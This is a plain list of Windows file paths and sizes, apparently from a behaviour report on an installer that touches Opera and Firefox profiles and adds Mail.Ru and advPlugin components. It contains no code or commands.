C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\000004.dbtmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000007 (72 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\favorites.db (776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000001 (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000003 (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000002 (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\686C.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000009 (49 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\favorites.db-journal (2930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\62C3.tmp (755 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\40EB206A466C1F1175CCB23E825B3250 (805 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Cookies-journal (29673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\4461.tmp (750 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\4462.tmp (749 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\session.dbak (1202 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\6847.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\4467.tmp (1929 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\000006.log (1682 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\LOG (466 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\40EB206A466C1F1175CCB23E825B3250 (824 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Opera Software\Opera Stable\Cache\f_000008 (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\000002.dbtmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Local Storage\chrome-extension_knohfebhibeknbfioecpdmdkjkjdnjnl_0.localstorage (154 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\dictionaries\dictionaries.xml (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\DB2A.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\828298824EA5549947C17DDABF6871F5_4A500E9AA7C5573906560F21D53A5861 (1312 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82414F9D7AB8999991FFEB2BC378A4EB_0B35E6FFBFE4E15ABA5FF0BD5F80BF61 (1624 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\8025.tmp (261 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\MANIFEST-000002 (69 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\DB12.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\MANIFEST-000001 (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CA7B2D59B4E9BC2D316D1AECDFC12F63_13131049604DA2DEFB9E5743B33A97AE (1520 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8059E9A0D314877E40FE93D8CCFB3C69_7DB2F61065E9C4FD781EBAB61B9C4C32 (463 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_UOq4DcKjuYo2ups (536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\stash.db-journal (576 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3559FD17375EFB765B4E3F23EFB797BB_A97E655B4CB86332E976B7C8B2FDE28E (1624 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Top Sites-journal (576 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\23B523C9E7746F715D33C6527C18EB9D (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\8026.tmp (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\200L4C4BCKNRZ2I6NNR0.temp (1444 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Certificate Revocation Lists (261 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8059E9A0D314877E40FE93D8CCFB3C69_7DB2F61065E9C4FD781EBAB61B9C4C32 (1432 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B176.tmp (750 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\000003.log (323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\EDF2.tmp (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_eupF8t4pFU9MicN (19820 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Login Data (734 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873 (1496 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension Rules\000001.dbtmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_R4ezmPGRCg7ignU (3980 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Visited Links (450 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CA7B2D59B4E9BC2D316D1AECDFC12F63_9747E3D3BF33A110ABC7B91BEE5A070A (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_JjSfCEfbRFB3t6C (290 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B165.tmp (3747 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CA7B2D59B4E9BC2D316D1AECDFC12F63_9747E3D3BF33A110ABC7B91BEE5A070A (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CA7B2D59B4E9BC2D316D1AECDFC12F63_13131049604DA2DEFB9E5743B33A97AE (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3559FD17375EFB765B4E3F23EFB797BB_A97E655B4CB86332E976B7C8B2FDE28E (471 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\828298824EA5549947C17DDABF6871F5_4A500E9AA7C5573906560F21D53A5861 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\BB3E.tmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7D266D9E1E69FA1EEFB9699B009B34C8_8CA7164968F366C9A94AC8E71C4BDD9B (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\000003.log (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\MANIFEST-000002 (69 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\MANIFEST-000001 (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\BAE0.tmp (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_11D7BA58D75E54D622A3AD9CDF9905BB (1624 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Local Storage\opera_startpage_0.localstorage (154 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82414F9D7AB8999991FFEB2BC378A4EB_0B35E6FFBFE4E15ABA5FF0BD5F80BF61 (471 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_11D7BA58D75E54D622A3AD9CDF9905BB (471 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_fXYZZRPYBkbMuMr (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Local Storage\opera_startpage_0.localstorage-journal (5114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\9E60.tmp (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B17A.tmp (3003 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\000001.dbtmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_1E5D470765E0BE1964814B1F5A3581DC (1592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension Rules\MANIFEST-000002 (69 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension Rules\MANIFEST-000001 (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\000002.dbtmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1060B7ADDE0FF6DE85637BF89FC4CEBC_17C332AE678FC2159EDCEEFD739AF1B2 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B17B.tmp (749 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B178.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_HUDtRxSZxY66ieP (3980 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\DB26.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\browser.js.new (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\DB14.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\DB01.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_hYE0nrER9U8qMAg (518 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE (1520 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1060B7ADDE0FF6DE85637BF89FC4CEBC_17C332AE678FC2159EDCEEFD739AF1B2 (1464 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\000001.dbtmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B179.tmp (1639 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\23B523C9E7746F715D33C6527C18EB9D (1056 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Login Data-journal (576 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\DB3C.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\DB28.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8890A77645B73478F5B1DED18ACBF795_1E5D470765E0BE1964814B1F5A3581DC (471 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension Rules\000002.dbtmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\BB9D.tmp (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B17C.tmp (3556 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_QfRkedxkFJM4bh7 (646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\siteprefs.json.new (865 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\A7E4.tmp (755 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\ab_tests.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B175.tmp (749 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_ARKT884Jkwy8IO8 (536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\8028.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7D266D9E1E69FA1EEFB9699B009B34C8_8CA7164968F366C9A94AC8E71C4BDD9B (1504 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_xihlG2cGlsGWF7o (3980 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B177.tmp (1685 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\8027.tmp (865 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Local Storage\chrome-extension_knohfebhibeknbfioecpdmdkjkjdnjnl_0.localstorage-journal (5109 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\EF0C.tmp (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\netF4A0.tmp (3172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµ.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµ.lnk (1 bytes)
C:\Windows (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\advPlugin\Storage.db-journal (544 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CT5DD99J.txt (87 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SRAS53O9.txt (265 bytes)
%Program Files% (x86)\advPlugin\Interfaces32.dll (159 bytes)
%Program Files% (x86)\advPlugin\BackgroundSingleton.exe (659 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mail.Ru.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\opera_autoupdate.log (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\SystemDir\nethost.exe (11518 bytes)
%Program Files% (x86)\advPlugin\Toolbar32.dll (253 bytes)
%Program Files% (x86)\advPlugin\Toolbar64.dll (339 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-7.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\menu.css (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-4.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\_mosaic.jpg (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\bookmarks\edit-dialog.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mail.Ru\Tmp\ffvisualbookmarks.7z (476985 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js.tmp (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\bookmarks\remove-dialog.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\news.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\libs\jquery-ui.js (38 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\05.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\application_core\jquery-core.js (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\wood_2.png (127 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\searchbar__button.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\install.rdf (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-5.jpg (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\thumbnails\mail.ru.jpeg (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\close.v2.png (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\wall.jpg (156 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\libs\suggests.js (32 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\mosaic.jpg (116 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\thumbnails\news.mail.ru.jpeg (83 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\bookmarks\layout.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\config\config.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\suggests.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\logo_bg.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\proto\informer.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\splash.css (29 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\fabric.jpg (140 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\themes.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\themes.css (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mail.Ru\GoMailRu.ico (14076 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\menu__item\menu__item-2.png (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\leather.png (107 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\application_core\visibleTab.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\searchbar.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\128x128.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\04.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\exchange\exchange-2.png (975 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\tabs.css (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\dialog\close.v2.png (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\10.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\11.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\google-analytics.js (712 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\11.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome.manifest (380 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\MRSputnikData\install_options.xml (554 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\background\background.js (707 bytes)
C:\Users\"%CurrentUserName%"\Favorites\Mail.Ru.url (152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-11.jpg (333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\leftright.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\slide__control\slide__control-edit.png (251 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\loader.gif (392 bytes)
